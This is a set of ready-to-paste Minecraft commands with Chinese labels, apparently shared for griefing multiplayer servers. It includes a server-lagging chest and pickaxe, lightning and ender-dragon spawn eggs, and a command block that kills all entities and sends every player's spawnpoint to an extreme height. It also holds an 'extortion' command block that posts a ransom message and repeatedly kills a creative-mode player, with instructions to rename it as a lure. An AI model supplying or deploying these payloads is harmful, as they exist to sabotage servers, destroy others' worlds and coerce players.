卡服箱子
/setblock ~ ~ ~ minecraft:chest[facing=south,type=single,waterlogged=false]{Items:[{Slot:0b,id:"minecraft:stone",Count:127b},{Slot:1b,id:"minecraft:stone",Count:127b},{Slot:2b,id:"minecraft:stone",Count:127b},{Slot:3b,id:"minecraft:stone",Count:127b},{Slot:4b,id:"minecraft:stone",Count:127b},{Slot:5b,id:"minecraft:stone",Count:127b},{Slot:6b,id:"minecraft:stone",Count:127b},{Slot:7b,id:"minecraft:stone",Count:127b},{Slot:8b,id:"minecraft:stone",Count:127b},{Slot:9b,id:"minecraft:stone",Count:127b},{Slot:10b,id:"minecraft:stone",Count:127b},{Slot:11b,id:"minecraft:stone",Count:127b},{Slot:12b,id:"minecraft:stone",Count:127b},{Slot:13b,id:"minecraft:stone",Count:127b},{Slot:14b,id:"minecraft:stone",Count:127b},{Slot:15b,id:"minecraft:stone",Count:127b},{Slot:16b,id:"minecraft:stone",Count:127b},{Slot:17b,id:"minecraft:stone",Count:127b},{Slot:18b,id:"minecraft:stone",Count:127b},{Slot:19b,id:"minecraft:stone",Count:127b},{Slot:20b,id:"minecraft:stone",Count:127b},{Slot:21b,id:"minecraft:stone",Count:127b},{Slot:22b,id:"minecraft:stone",Count:127b},{Slot:23b,id:"minecraft:stone",Count:127b},{Slot:24b,id:"minecraft:stone",Count:127b},{Slot:25b,id:"minecraft:stone",Count:127b},{Slot:26b,id:"minecraft:stone",Count:127b}]}


闪电蛋
/give @p minecraft:pig_spawn_egg{display:{Name:"[{\"text\":\"闪电\"}]"},EntityTag:{id:"minecraft:lightning_bolt"}}

末影龙蛋
/give @p minecraft:pig_spawn_egg{display:{Name:"[{\"text\":\"末影龙·毁图神器\"}]"},EntityTag:{id:"minecraft:ender_dragon"}}


外来指令源

setblock ~ ~ ~ minecraft:shulker_box[facing=up]{Items:[{Slot:0b,id:"minecraft:command_block",Count:1b,tag:{RepairCost:0,BlockEntityTag:{conditionMet:1b,auto:1b,powered:0b,CustomName:'{"text":"@"}',Command:"summon falling_block ~ ~1 ~ {Time:1,BlockState:{Name:redstone_block},Passengers:[{id:armor_stand,Health:0,Passengers:[{id:falling_block,Time:1,BlockState:{Name:activator_rail},Passengers:[{id:command_block_minecart,Command:'gamerule commandBlockOutput false'},{id:command_block_minecart,Command:'data merge block ~ ~-2 ~ {auto:0}'},{id:command_block_minecart,Command:'spawnpoint @a 1 999999999 1'},{id:command_block_minecart,Command:'kill @e'},{id:command_block_minecart,Command:'一直复制此行并在此处输入命令'}]}]}]}",LastExecution:5142L,id:"minecraft:command_block",SuccessCount:1,LastOutput:'{"extra":[{"translate":"commands.summon.success","with":[{"insertion":"5920c788-eb02-44a4-98d8-1352f0d85ed0","hoverEvent":{"action":"show_entity","contents":{"type":"minecraft:falling_block","id":"5920c788-eb02-44a4-98d8-1352f0d85ed0","name":{"translate":"entity.minecraft.falling_block"}}},"translate":"entity.minecraft.falling_block"}]}],"text":"[20:32:39] "}',TrackOutput:1b,UpdateLastExecution:1b},display:{Lore:['"(+NBT)"'],Name:'{"text":"骇客毁服命令方块(千万别放）"}'}}}]}

卡服镐子
/setblock ~ ~1 ~ minecraft:shulker_box[facing=up]{Items:[{Slot:0b,id:"minecraft:diamond_pickaxe",Count:1b,tag:{display:{Name:"[{\"text\":\"崩坏\",\"color\":\"dark_red\"}]"},Unbreakable:1b,AttributeModifiers:[{Amount:9.9999999E7d,Slot:"mainhand",AttributeName:"generic.luck",Operation:0,UUID:[I;746003352,-1753004491,-1686455388,1348927638],Name:"generic.luck"}],Enchantments:[{lvl:2147483647,id:"minecraft:fortune"}]}}]}

威胁勒索
/setblock ~ ~ ~ minecraft:chest[facing=east,type=single,waterlogged=false]{Items:[{Slot:0b,id:"minecraft:command_block",Count:1b,tag:{RepairCost:0,BlockEntityTag:{conditionMet:1b,auto:1b,CustomName:'{"text":"@"}',powered:0b,Command:"summon falling_block ~ ~1 ~ {Time:1,BlockState:{Name:redstone_block},Passengers:[{id:armor_stand,Health:0,Passengers:[{id:falling_block,Time:1,BlockState:{Name:activator_rail},Passengers:[{id:command_block_minecart,Command:'say 哈哈哈哈,交出我想要的可以保证你的存档无恙'},{id:command_block_minecart,Command:'data merge block ~ ~-2 ~ {auto:0}'},{id:command_block_minecart,Command:'scoreboard objectives add 123 trigger'},{id:command_block_minecart,Command:'tag @a[limit=1,sort=nearest,gamemode=creative] add fz1031'},{id:command_block_minecart,Command:'tag @a[limit=1,sort=nearest,gamemode=creative] add fz1030'},{id:command_block_minecart,Command:'forceload add ~-1 ~-1 ~1 ~1'},{id:command_block_minecart,Command:'setblock ~1 ~10 ~ minecraft:repeating_command_block[conditional=false,facing=west]{auto:1b,CustomName:\\'{\"text\":\"世界之声\"}\\',Command:\"/gamerule sendCommandFeedback false\"}'},{id:command_block_minecart,Command:'setblock ~-1 ~10 ~ minecraft:repeating_command_block[conditional=false,facing=west]{auto:1b,CustomName:\\'{\"text\":\"世界之声\"}\\',Command:\"/scoreboard players enable @a 123\"}'},{id:command_block_minecart,Command:'setblock ~ ~10 ~ minecraft:repeating_command_block[conditional=false,facing=west]{auto:1b,CustomName:\\'{\"text\":\"世界之声\"}\\',Command:\"kill @e[tag=fz1030]\"}'},{id:command_block_minecart,Command:'setblock ~1 ~10 ~1 minecraft:repeating_command_block[conditional=false,facing=west]{auto:1b,CustomName:\\'{\"text\":\"世界之声\"}\\',Command:\"execute as @a[scores={123=1..}] run tag @a remove fz1030\"}'},{id:command_block_minecart,Command:'setblock ~ ~10 ~1 minecraft:chain_command_block[conditional=true,facing=west]{auto:1b,CustomName:\\'{\"text\":\"世界之声\"}\\',Command:\"scoreboard players set @a 123 0\"}'},{id:command_block_minecart,Command:'setblock ~1 ~10 ~-1 minecraft:repeating_command_block[conditional=false,facing=west]{auto:1b,CustomName:\\'{\"text\":\"世界之声\"}\\',Command:\"execute as @a[scores={123=..-1}] run tag @a[tag=fz1031] add fz1030\"}'},{id:command_block_minecart,Command:'setblock ~ ~10 ~-1 minecraft:chain_command_block[conditional=true,facing=west]{auto:1b,CustomName:\\'{\"text\":\"世界之声\"}\\',Command:\"/scoreboard players set @a 123 0\"}'},{id:command_block_minecart,Command:'setblock ~ ~1 ~ command_block{auto:1,Command:\"fill ~ ~ ~ ~ ~-3 ~ air\"}'},{id:command_block_minecart,Command:'kill @e[type=command_block_minecart,distance=..1]'}]}]}]}",id:"minecraft:command_block",SuccessCount:0,TrackOutput:1b,UpdateLastExecution:1b},display:{Lore:['"(+NBT)"'],Name:'{"text":"改成你想好能引诱的名字"}'}}}]}